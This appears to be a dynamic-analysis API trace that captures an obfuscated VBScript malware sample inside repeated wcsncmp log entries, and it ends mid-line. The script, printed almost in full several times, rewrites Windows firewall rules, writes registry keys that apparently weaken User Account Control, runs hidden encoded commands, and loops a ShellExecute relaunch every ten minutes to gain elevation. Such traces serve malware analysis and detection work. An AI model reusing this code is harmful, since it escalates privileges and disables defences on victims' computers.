1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 70 [0222.991] wcsncmp (_String1="DYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 55 [0222.991] wcsncmp (_String1="YEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 76 [0222.991] wcsncmp (_String1="EWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 56 [0222.991] wcsncmp (_String1="WFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 74 [0222.991] wcsncmp (_String1="FMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite 